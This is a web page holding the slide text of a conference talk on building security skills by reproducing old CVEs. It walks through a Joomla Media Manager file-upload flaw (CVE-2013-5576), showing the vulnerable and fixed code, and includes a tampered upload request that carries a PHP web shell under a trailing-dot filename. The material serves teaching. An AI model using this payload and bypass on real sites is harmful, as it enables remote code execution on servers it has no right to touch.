OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Symfony finally swiped right on envvars
Symfony finally swiped right on envvarsSymfony finally swiped right on envvars
Symfony finally swiped right on envvars
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
It's a Dangerous World
It's a Dangerous World It's a Dangerous World
It's a Dangerous World
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 

Recently uploaded

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 

Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs

  • 1. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Climb the infosec skill tree by revisiting past CVEs Sandra Escandor-O’Keefe Security Engineer at Fastly s3scand0r
  • 2. Climbing the InfoSec Skill Tree ● What’s In It For You? ● A Suggested Strategy ● Fundamental Concept Trees ● CVE-2013-5576 As Example ● Revisiting Ideas Related to CVE ● Conclusion Talk Outline
  • 3. Climbing the InfoSec Skill Tree Motivation From: Andreas Vesalius' Fabrica, published in 1543 There’s more problems to solve in information security than there are people to solve them. We need a continuous source of fresh brains to solve these problems
  • 4. Climbing the InfoSec Skill Tree ● Major benefit: Helps you to look at concepts with fresh eyes ● Structuring a mentorship relationship is a challenge ○ This talk can help you get an idea of how to structure such a relationship For (Potential) Mentors
  • 5. Climbing the InfoSec Skill Tree Skill Builder sees: ● Path is hazy ● A CVE, but how was reasoning developed? For Skill Builders This way leads to technical mastery
  • 6. Climbing the InfoSec Skill Tree Reproduce CVE findings A Suggested Approach
  • 7. Climbing the InfoSec Skill Tree ● Reproduction leads to deeper understanding: ○ The system where vulnerability lies ○ Vulnerability and why it’s there ○ Where does system tend to be vulnerable? ○ Technical fundamental concepts Motivation for the Skill Builder
  • 8. Climbing the InfoSec Skill Tree ● Inspired by “How to Read a Paper” by S.Keshav ○ Three pass approach to research paper reading ● CVE findings are essentially research findings but they may or may not have formal paper associated with them General Strategy
  • 9. Climbing the InfoSec Skill Tree ● First pass: Quick glance ● Second pass: ○ Set up a test environment ○ Get feel for structure of segment of vulnerable code ● Third pass: Look at the details General Approach
  • 10. Climbing the InfoSec Skill Tree Ask: ● What tools do you think were used to find the vulnerability? ● What are the fundamental concepts related to this vulnerability? (i.e, client-server architecture; communication protocol specifics, like HTTP) ● How would you classify this vulnerability? ● How would you set up a test environment? First Pass
  • 11. Climbing the InfoSec Skill Tree Examine, but not in too much detail: ● Diff of fix vs. vulnerable code ○ Get feel for structure of surrounding code where vulnerability exists ● Set up a test environment Second Pass
  • 12. Climbing the InfoSec Skill Tree ● Attempt to hit vulnerability w/o using existing exploit ○ Manual experimentation? ○ Write a script? ○ Other existing tools? (e.g tamper data) ● Think about why vulnerability exists ● Create Fundamental Concepts Tree Third Pass
  • 13. Climbing the InfoSec Skill Tree ● Run current existing exploit afterwards ● If running current existing exploit was not smooth, debug until it runs well ○ Make notes of what you needed to change ○ Equivalent to Keshav’s “You should identify and challenge every assumption in every statement” Third Pass cont’d
  • 14. Climbing the InfoSec Skill Tree Borrowing from Sid Meier’s Alpha Centauri: Create a fundamental concepts tree Third Pass cont’d.
  • 15. Climbing the InfoSec Skill Tree Fundamental Concepts Tree CVE-2013-5576 Client-Server Model HTTP Headers HTTP Protocol OSI Model Input Validation Vulnerabilitie s Arbitrary Code Execution Absolute and Relative Pathnames File System Structure File System Permissions Arbitrary File Uploads
  • 16. Climbing the InfoSec Skill Tree Allows us to: ● Reflect on what we learned ○ Where do we lack understanding? ● Help others learn Fundamental Concepts Trees
  • 17. Climbing the InfoSec Skill Tree ● Bug reported to Joomla! by Verasafe ● Joomla Media Manager component vuln. ● Arbitrary file upload vulnerability ● Results in arbitrary code execution ● Affected: Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions Introducing CVE-2013-5576
  • 18. Climbing the InfoSec Skill Tree After first pass, what did I do? ● Created test environment ● Diff vulnerable code with Fixed code ● Manual test for vulnerability w/o original exploit ● Examined what makes the code vulnerable ● Examined original exploit in detail CVE-2013-5576 as Example
  • 19. Climbing the InfoSec Skill Tree Test Environment Details ● On VM: Ubuntu 64-bit 12.04.5 (Ubuntu Precise) ● PHP 5.3.10-1ubuntu3.26 ● Apache 2.2.22 (Ubuntu) ● Followed installation instructions for Joomla 3.1.4 Stable (Ember) CVE-2013-5576 as Example, cont’d.
  • 20. Climbing the InfoSec Skill Tree CVE-2013-5576 as Example, cont’d. Vulnerable Code Fixed Code if (!in_array($format, $allowable) && !in_array($format, $ignored)) if ($format == '' || $format == false || (!in_array($format, $allowable) && !in_array($format, $ignored))) $format = strtolower(JFile::getExt($file[‘name’])); … if (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): Fix: Extra condition added Key condition: If this is true, then upload is NOT allowed If filename extension is not in $allowable AND if filename extension is not in $ignored, then don’t allow upload
  • 21. Climbing the InfoSec Skill Tree ● Used Tamper Data browser plugin ● Modified filename passed to server by experimenting ○ Based on filename strings that I’ve seen before that cause issues, i.e) “*.*”, “.*”, etc. ○ Watch response behavior CVE-2013-5576 Manual Testing
  • 22. Climbing the InfoSec Skill Tree CVE-2013-5576 Manual Testing, cont’d Original POST data (regular request) New POST data ----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="Filedata[]"; filename="shell.php"rnContent-Type: application/x- phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP T_LANGUAGE']);n?>nrn----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="folder"rnrnrn---------- ------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="return- url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW E=rn----------------------------- 112817922114815867397460213--rn ----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="Filedata[]"; filename="shell.php.*"rnContent-Type: application/x- phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP T_LANGUAGE']);n?>nrn----------------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="folder"rnrnrn---------- ------------------- 112817922114815867397460213rnContent- Disposition: form-data; name="return- url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW E=rn----------------------------- 112817922114815867397460213--rn “.*” added here Create an administrator type user, log in, and use the “Media Manager” option to upload a file. Before uploading the file, set Tamper Data to start the tamper.
  • 23. Climbing the InfoSec Skill Tree ● We know that $format is problematic (from diffing fixed vs. vulnerable code) ● Examine how $format is generated, see JFile::getExt (in libraries/joomla/filesystem/file.php) Why Does Vulnerability Occur? $format = strtolower(JFile::getExt($file[‘name’])); … If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called by canUpload(..)):
  • 24. Climbing the InfoSec Skill Tree What I initially assumed: Why Does Vulnerability Occur? cont’d. Tamper data POST request modified $file = “shell.php.*” In JFile getExt: $format = strtolower(JFile::getExt($file[‘name’])); … If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called in canUpload(..)): 0 1 2 3 4 5 6 7 8 9 10 11 s h e l l . p h p . * 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c PHP’s substr should give back “*”
  • 25. Climbing the InfoSec Skill Tree In reality: Why Does Vulnerability Occur? cont’d. Use Tamper data to modify POST request $file = “shell.php.” In JFile getExt: ZSTR_LEN(str) = 9 f = 10 (this is $dot above) Then the following condition is met: If (f > (zend_long) ZSTR_LEN(str)){ RETURN_FALSE; } Working through PHP_FUNCTION(substr) 0 1 2 3 4 5 6 7 8 9 10 s h e l l . p h p . 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c PHP’s substr returns FALSE JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called by canUpload(..)): Joomla Filename cleanup $file = “shell.php.” $dot = 9 + 1 = 10 FALSE returned
  • 26. Climbing the InfoSec Skill Tree Why Does Vulnerability Occur? cont’d. $format = strtolower(JFile::getExt($file[‘name’])); $allowable = explode(‘,’, $upload_extensions); $ignored = explode(‘,’, $ignore_extensions); If (!in_array($format, $allowable) && !in_array($format, $ignored)){ return false; //Not allowed to upload file } Vulnerable Code (snippet of canUpload(..)): JFile::getExt($file) { $dot = strrpos($file, ‘.’) + 1; return substr($file, $dot); } (snippet of getExt, called in canUpload(..)): getExt returns FALSE => $format = ‘’ (empty str) $allowable is an array of accepted file extensions. !in_array($format, $allowable) => TRUE (i.e extension is NOT allowed) $ignored: Because textbox input is empty, after explode, Array( [0]=> ) - it is an array with one element with value of ‘’ therefore $format is in it. !in_array($format, $ignored) => FALSE (i.e our file extension can be allowed to pass through $ignored is an array of ext’s to let pass through. Default install: $ignore_extensions empty str TRUE && FALSE => FALSE :. File upload allowed
  • 27. Climbing the InfoSec Skill Tree In reality: Why Does Vulnerability Occur? cont’d. Use Tamper data to modify POST request $file = “shell.php.” In JFile getExt: 0 1 2 3 4 5 6 7 8 9 10 s h e l l . p h p . 0 For PHP’s substr, see: github.com/php/php- src/blob/master/ext/standard/string.c Joomla Filename cleanup JFile::makesafe filters out: Any two or more consecutive “.” (i.e “..”, “...”) (.){2,} Any character that is not alphanumeric, a “.”, a “_”, or a “-”, or a single space [^A-Za-z0-9.-_ ] Any single “.” at the beginning ^. shell.php.* shell.php.
  • 28. Climbing the InfoSec Skill Tree Given findings of manual tests, initial PoC: ● Had trailing “.*” ○ Analysis of vuln afterwards showed this trailing “*” was unnecessary (i.e, only trailing “.” is needed for exploitation) Comparing CVE-2013-5576 Exploits
  • 29. Climbing the InfoSec Skill Tree ● Linux filenames are just a sequence of bytes that can’t contain 0x00 or 0x2F (slash (‘/’))(Source: http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_170) ○ Therefore, “webshell.php.” is a valid filename ● It’s worth exploring C source code of PHP, especially for standard string functions, e.g substr, strrpos ○ We can miss a lot, esp. edge cases by only looking at documentation CVE-2013-5576 Takeaways
  • 30. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Some Additional Things To Think About
  • 31. Climbing the InfoSec Skill Tree ● LangSec - a defense method ○ Proposed by Meredith L. Patterson, Sergey Bratus, and Dan Hirsch @ Brucon ‘12 ○ Any processing of untrusted input should have a formal language to define valid input ○ The input handler should be a “recognizer” for that valid input ○ Big concept here: Finite State Machines Revisiting Ideas Related to CVE
  • 32. Climbing the InfoSec Skill Tree Example: Only process binary number with even number of 0s Revisiting Ideas Related to CVE Image By Cepheus - Own work, Public Domain, https://commons.wikimedia.org/w/index.php?curid=1234893 Input Accept State Further processing can safely be done on data only if finite state machine is in accept state after input processed
  • 33. Climbing the InfoSec Skill Tree What modifications can you make to Joomla 3.1.4 in order to create a recognizer for the Joomla Media Manager component, such that it recognizes valid filenames and only allows processing of those? Take-home Challenge
  • 34. Climbing the InfoSec Skill Tree ● A suggested approach for the Skill Builder ● Creating fundamental concept trees to help you and others ● Showed an example thought process through a CVE ● Revisited Ideas Related to CVE Shown:
  • 35. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia Thanks for listening